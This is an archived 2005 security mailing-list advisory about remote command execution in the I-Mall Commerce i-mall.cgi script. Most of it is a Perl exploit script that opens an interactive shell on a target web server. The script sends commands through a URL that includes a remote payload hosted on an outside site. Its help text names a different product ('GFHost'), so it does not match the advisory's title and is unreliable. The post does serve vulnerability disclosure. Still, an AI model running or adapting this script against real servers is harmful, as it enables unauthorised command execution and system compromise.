[EXPL] I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)

• Previous message: SecuriTeam: "[NT] ASP.NET's __VIEWSTATE Prone to Replay Attacks and DoS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 4 May 2005 19:08:42 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  I-Mall Commerce i-mall.cgi Arbitrary Command Execution (Exploit)
------------------------------------------------------------------------

SUMMARY

I-Mall Commerce is "a CGI based online shopping suite in Korean language".
A remote command execution vulnerability has been discovered in the I-Mall
CGI Application by ZetaLabs, Zone-H Laboratories. The following exploit
code can be used to test your system for them mentioned vulnerability.
This issue occurs due to insufficient filtering of externally supplied
data to the i-mall.cgi script that allows a remote user to pass an
arbitrary shell command which will be executed by the script. An attacker
may exploit this vulnerability to execute commands in the security context
of the web server hosting the affected script.

DETAILS

Exploit:
##############################################
# GFHost explo
# Spawn bash style Shell with webserver uid
# Greetz SPAX, foxtwo, Zone-H
# This Script is currently under development
##############################################

use strict;
use IO::Socket;
my $host;
my $port;
my $command;
my $url;
my @results;
my $probe;
my @U;
$U[1] = "/dl.php?a=0.1&OUR_FILE=ff24404eeac528b".
"&f=http://utenti.lycos.it/z00/xpl.gif&cmd=";
&intro;
&scan;
&choose;
&command;
&exit;
sub intro {
&help;
&host;
&server;
sleep 1;
};
sub host {
print "\nHost or IP : ";
$host=<STDIN>;
chomp $host;
if ($host eq ""){$host="127.0.0.1"};
print "\nPort (enter to accept 80): ";
$port=<STDIN>;
chomp $port;
if ($port =~/\D/ ){$port="80"};
if ($port eq "" ) {$port = "80"};
};
sub server {
my $X;
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
$probe = "string";
my $output;
my $webserver = "something";
&connect;
for ($X=0; $X<=10; $X++){
 $output = $results[$X];
 if (defined $output){
 if ($output =~/apache/){ $webserver = "apache" };
 };
};
if ($webserver ne "apache"){
my $choice = "y";
chomp $choice;
if ($choice =~/N/i) {&exit};
            }else{
print "\n\nOK";
 };
};
sub scan {
my $status = "not_vulnerable";
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
my $loop;
my $output;
my $flag;
$command="dir";
for ($loop=1; $loop < @U; $loop++) {
$flag = "0";
$url = $U[$loop];
$probe = "scan";
&connect;
foreach $output (@results){
if ($output =~ /Directory/) {
                              $flag = "1";
         $status = "vulnerable";
         };
 };
if ($flag eq "0") {
}else{
     };
};
if ($status eq "not_vulnerable"){

    };
};
sub choose {

my $choice="1";
chomp $choice;
if ($choice > @U){ &choose };
if ($choice =~/\D/g ){ &choose };
if ($choice == 0){ &other };
$url = $U[$choice];
};
sub other {
my $other = <STDIN>;
chomp $other;
$U[0] = $other;
};
sub command {
while ($command !~/quit/i) {
print "[$host]\$ ";
$command = <STDIN>;
chomp $command;
if ($command =~/quit/i) { &exit };
if ($command =~/url/i) { &choose };
if ($command =~/scan/i) { &scan };
if ($command =~/help/i) { &help };
$command =~ s/\s/+/g;
$probe = "command";
if ($command !~/quit|url|scan|help/) {&connect};
};
&exit;
};
sub connect {
my $connection = IO::Socket::INET->new (
    Proto => "tcp",
    PeerAddr => "$host",
    PeerPort => "$port",
    ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
$connection -> autoflush(1);
if ($probe =~/command|scan/){
print $connection "GET $url$command HTTP/1.1\r\nHost: $host\r\n\r\n";
}elsif ($probe =~/string/) {
print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
};

while ( <$connection> ) {
   @results = <$connection>;
    };
close $connection;
if ($probe eq "command"){ &output };
if ($probe eq "string"){ &output };
};
sub output{
my $display;
if ($probe eq "string") {
   my $X;
   for ($X=0; $X<=10; $X++) {
   $display = $results[$X];
   if (defined $display){print "$display";};
    };
   }else{
   foreach $display (@results){
       print "$display";
    };
                          };
};
sub exit{
print "\n\n\n ORP";
exit;
};
sub help {
print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
print "\n
        GFHost PHP GMail
        Command Execution Vulnerability by SPABAM 2004" ;
print "\n http://www.zone-h.org/advisories/read/id=4904
";
print "\n GFHost.pl Exploit v1.1";
print "\n \n note.. Script under DEVEL";
print "\n";
print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
print "\n Command: SCAN URL HELP QUIT";
print "\n\n\n\n\n\n\n\n\n\n\n";
};

ADDITIONAL INFORMATION

The information has been provided by <mailto:jerome@athias.fr> Jerome
ATHIAS .
The original article can be found at:
<http://www.zone-h.org/advisories/read/id=4904>
http://www.zone-h.org/advisories/read/id=4904

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] ASP.NET's __VIEWSTATE Prone to Replay Attacks and DoS"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]